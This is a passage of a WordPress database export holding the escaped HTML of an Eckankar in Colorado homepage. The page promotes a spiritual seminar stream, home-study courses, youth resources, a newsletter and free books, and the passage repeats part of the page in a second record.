data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p class=\"mod-reset\"><img class=\"alignnone wp-image-269414 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.45) 0px 25px 20px -20px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/11/streaming-web-promo-1.jpg\" alt=\"\" width=\"801\" height=\"445\"></p>\r\n<p class=\"\" style=\"font-style: normal; font-family: \'Open Sans\'; font-weight: 600; font-size: 18px; text-align: center; color: #cd8a0e;\" data-font-style=\"normal\" data-font-weight=\"600\" data-font-family=\"Open Sans\">New to ECK? Guests register free!</p>\r\n<p class=\"\" style=\"text-align: center;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/engage/eck-soul-adventure-seminars/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get More Information and Register Now!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-6\" style=\"padding-right: 0em; padding-left: 2em;\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: 5px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Now streaming through January 31, 2024</h2>\r\n<p class=\"\" style=\"font-size: 21px; font-family: \'Open Sans\'; font-weight: bold; color: #697085; line-height: 26px;\" data-font-family=\"Open Sans\" data-font-weight=\"700\" data-font-style=\"\">Experience the spiritual wonders of the 2023 ECKANKAR Soul Adventure Seminar from anywhere!</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Hear Sri Harold, the Mahanta, the Living ECK Master, speak to the world. His stories and wisdom open the heart to a higher love and show you practical ways to live the spiritual life to its fullest potential.</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 600;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured Events Include:</p>\r\n<ul class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">\r\n	<li>Keynote talk, by Sri Harold Klemp, the spiritual leader of ECKANKAR;</li>\r\n	<li>All main-stage talks and performances; and</li>\r\n	<li>The 2023 digital Spiritual Art Gallery.</li>\r\n	<li>NEW ECKANKAR Soul Adventure Podcast—Animals Are Souls Too</li>\r\n	<li>ECK Soul Adventure Magazine—How Do We Soul Travel?</li>\r\n</ul>\r\n<p class=\"\" style=\"text-align: left; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Take your next spiritual step today.<br>\r\nYour life can truly be a Soul Adventure!</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">What inspires you?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><a href=\"https://www.eckankar.org/eck-soul-adventure/\">ECKSoulAdventure.org</a> offers dynamic podcasts, compelling spiritual art-work, stories of encounters with the Divine, and so much more.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Explore all the lookout points on the Path of Spiritual Freedom.</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"http://ECKSoulAdventure.org\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Experience your ECK Soul Adventure now<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"border-width: 0px; background-image: url(\'https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\'); background-size: cover; background-position: 50% 50%;\" data-image-url=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/teacher-bg.jpg\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\" style=\"border-width: 0px; padding: 1em; padding-left: 50px;\">\r\n<p class=\"\" style=\"padding: 1em 0px 0em 0em; border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; color: #cd8a0e; font-size: 19px; margin-top: 1px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ECK SOUL ADVENTURE GUIDE</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SRI HAROLD KLEMP</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Spiritual teachers from an ancient lineage walk among us today—Adepts who have mastered the spiritual laws of life, embodying them in thought, word, and deed. Teachers of the highest order.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-size: 17px;\">These are the ECK Masters.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; line-height: 27px; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Chief among them is the Mahanta, the Living ECK Master. As an inner and outer spiritual teacher, his role is to awaken the God-knowledge already within you.<br>\r\n<br>\r\n<a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/eck-master/sri-harold-klemp/\" target=\"_blank\" rel=\"noopener\">Meet Sri Harold<i class=\"arrow right\"></i></a></p>\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"mod-reset\" style=\"border-width: 0px; padding-top: 0em;\"><img class=\"aligncenter wp-image-267933 size-full\" style=\"padding-top: 59px;\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/sri-harold-shaking-hands-transp-2.png\" alt=\"\" width=\"450\" height=\"388\"></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0px; border-width: 0px;\"><img class=\"alignnone wp-image-267852 size-full\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/02/esc-sun-lensflare-2.jpg\" alt=\"\" width=\"464\" height=\"422\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 43px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WANT TO GO DEEPER?</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">ADVANCED SPIRITUAL LIVING COURSES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">This home-study program from Eckankar is a road map for your journey to Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Understand the spiritual forces that shape the fabric of your everyday life. Find divine purpose in every moment.</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">As Soul, you have the God-knowledge within you!</p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.eckankar.org/engage/advanced-spiritual-living/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Begin Your Journey<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 0px; padding-top: 48px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 4% 0% 2%; border-width: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\"><img class=\"aligncenter size-full wp-image-249746\" src=\"https://eckankar-colorado.org/wp-content/uploads/2020/01/Youth-in-ECK-sized.jpg\" alt=\"A series of 6 images showing youth in Eckankar\" width=\"555\" height=\"328\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 0px; box-shadow: #cecece 0px 0px 0px 0px inset;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">WHEN YOUR CHILD ASKS ABOUT GOD</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 0px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">HOW WILL YOU ANSWER?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Children often have profound spiritual experiences. Like many adults, they look for meaning in life and want to know the cause behind all causes.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">The ECK teachings offer spiritual understanding, tools, and insight that can help parents answer their children’s heartfelt questions.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">For more information about local youth activities please contact the <a href=\"https://eckankar-colorado.org/youth-and-family-contact-form/\" rel=\"noopener\">Colorado Youth &amp; Family Director</a></p>\r\n<p class=\"\" style=\"border-width: 0px; margin-top: 0px; padding: 1em 0em 0em;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" style=\"padding-right: 1em; padding-left: 1em; font-family: \'Open Sans\'; font-weight: 400; font-size: 15px;\" href=\"https://www.adventuresineckparenting.org/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Explore ECKparents.org<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color1-background-color color-1-text-contrast bg-background-color tmpl-media-11 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 64px; padding-bottom: 20px;\">\r\n<div class=\"col-md-8 col-xs-12 col-sm-8 col-lg-12\">\r\n<h2 class=\"\" style=\"border-width: 0px; font-family: Raleway; font-weight: 500; color: #697085; text-align: center; font-size: 35px;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">Discover More About Eckankar</h2>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-text-10 boldgrid-section dynamic-gridblock\" style=\"border-width: 0px;\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-bottom: 30px; border-width: 0px;\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"tmpl-services-10 boldgrid-section dynamic-gridblock bg-background-color color1-background-color color-1-text-contrast\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-4 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"mod-reset\"><img class=\"aligncenter wp-image-269300 size-full bg-img alignnone bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/meetup-img-1-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-6 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"alignnone wp-image-269326 size-full aligncenter bg-img bg-img-square\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/newsletter-img-2-11-3-2023.jpg\" alt=\"\" width=\"359\" height=\"180\"></p>\r\n</div>\r\n<div class=\"col-lg-4 col-md-4 col-sm-12 col-xs-12\">\r\n<p class=\"\"><img class=\"bg-img bg-img-square alignnone wp-image-269341 size-full\" style=\"box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px;\" src=\"https://demo2.cloudwp.dev/trial-22xytvtx/wp-content/uploads/2023/11/freebooks-img-5-11-3-2023.jpg\" alt=\"\" width=\"360\" height=\"180\"></p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-top: 3px; padding-bottom: 15px;\">\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\" style=\"box-shadow: #cecece 0px 0px 0px 0px; border-bottom-right-radius: 0px;\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; border-bottom-left-radius: 0px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; text-align: center; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Spiritual Connections</p>\r\n<p class=\"\" style=\"font-size: 17px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">The purpose of this Meetup group is to provide a common meeting ground for all who have had, or would like to have, a life-changing spiritual experience.</p>\r\n<p>&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://www.meetup.com/find/?keywords=eckankar&amp;source=GROUPS&amp;distance=hundredMiles&amp;location=us--co--Denver\" target=\"_blank\" rel=\"noopener\">Join Us On Meetup®<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #f5f2eb; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-size: 23px; font-family: \'Raleway\'; font-weight: 600; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">Get Your Monthly Newsletter!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 18px; font-weight: 600; font-family: \'Open Sans\';\" data-font-weight=\"600\" data-font-family=\"Open Sans\" data-font-style=\"\">Delivered right to your email inbox!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-bottom: 26px; font-family: \'Open Sans\'; font-weight: 400;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Keep up with all the latest news and events from around the state.</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"\" style=\"font-weight: 400; font-family: \'Open Sans\'; font-size: 16px;\" href=\"https://eckankar-colorado.org/resa-faq/newsletter-subscription-members/\" data-font-weight=\"400\" data-font-family=\"Open Sans\" data-font-style=\"\">(Sunscribe to Initiates Newsletter Here)</a></p>\r\n<p class=\"\" style=\"text-align: center;\"><em>&nbsp;</em><a class=\"btn btn-color-1 btn-raised btn-rounded\" tabindex=\"0\" href=\"https://eckankar-colorado.org/newsletter-subscription-public/\"> Public&nbsp;Newsletter Signup<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"col-md-4 col-sm-4 col-xs-12 col-lg-4\">\r\n<div class=\"row\" style=\"padding-top: 0em; padding-bottom: 15px; box-shadow: #cecece 0px 0px 0px 0px inset;\">\r\n<div class=\"col-md-12 col-sm-12 col-xs-12 col-lg-12\">\r\n<div style=\"border-top: 7px solid #cd8a0e; background-color: #fbeed0; padding: 15px; box-shadow: rgba(0, 0, 0, 0.24) 0px 3px 8px; margin-top: -3px;\" class=\"\">\r\n<p class=\"\" style=\"text-align: center; margin: -40px 0px 25px;\">&nbsp;</p>\r\n<p class=\"\" style=\"font-family: \'Raleway\'; font-weight: 600; font-size: 23px; text-align: center; color: rgba(62, 62, 62, 0.9);\" data-font-family=\"Raleway\" data-font-weight=\"600\" data-font-style=\"\">ECK Books Just For You</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px; margin-top: 6px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Find out how past lives, dreams, and<br>\r\nSoul Travel help you find God</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">This free-book offer includes two titles:<br>\r\n<strong><em>ECKANKAR—Ancient Wisdom for Today</em></strong> and <strong><em>Is Life a Random Walk?</em></strong></p>\r\n<p class=\"mod-reset\" style=\"text-align: center;\">&nbsp;</p>\r\n<p class=\"\" style=\"text-align: center;\"><a class=\"btn btn-color-1 btn-raised btn-rounded\" href=\"https://www.eckankar.org/freebook/wisdom/\" target=\"_blank\" rel=\"noopener\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Get Your ECK Books!<i class=\"arrow right\"></i></a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 67px; padding-bottom: 63px; box-shadow: rgba(0, 0, 0, 0.15) 0px 2px 8px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-5\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p>[embed] https://www.youtube.com/watch?v=s78XVcM7HWI[/embed]</p>\r\n</div>\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 col-lg-7\">\r\n<h2 class=\"\" style=\"font-family: \'Open Sans\'; font-weight: 600; box-shadow: #cecece 0px 0px 0px 0px inset; margin-top: -12px; color: #cd8a0e; font-size: 19px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">Featured eck Video</h2>\r\n<p class=\"\" style=\"font-size: 29px; font-family: \'Open Sans\'; font-weight: 600; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">DO YOU LONG TO KNOW LIFE\'S PURPOSE?</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">If you are ready for your next spiritual step, Eckankar’s Advanced Spiritual Living Courses offer a roadmap for your journey home to the heights of Self-Discovery and God-Discovery.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">You don’t need to change your lifestyle to live a rich spiritual life. Enlightenment comes in a natural way from the inside out.</p>\r\n<p class=\"\" style=\"font-size: 17px;\">Ready to get your keys to spiritual transformation?</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242893,41186,'post_new_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"color-1-text-contrast bg-background-color tmpl-media-7 boldgrid-section dynamic-gridblock\">\r\n<div class=\"container\">\r\n<div class=\"row bg-background-color color1-background-color color-1-text-contrast\" style=\"padding-top: 36px; padding-bottom: 29px; margin-bottom: 25px;\">\r\n<div class=\"col-md-6 col-xs-12 col-sm-6 text-center col-lg-6\" style=\"box-shadow: #cecece 0px 0px 0px 0px inset; padding-right: 0em;\">\r\n<p 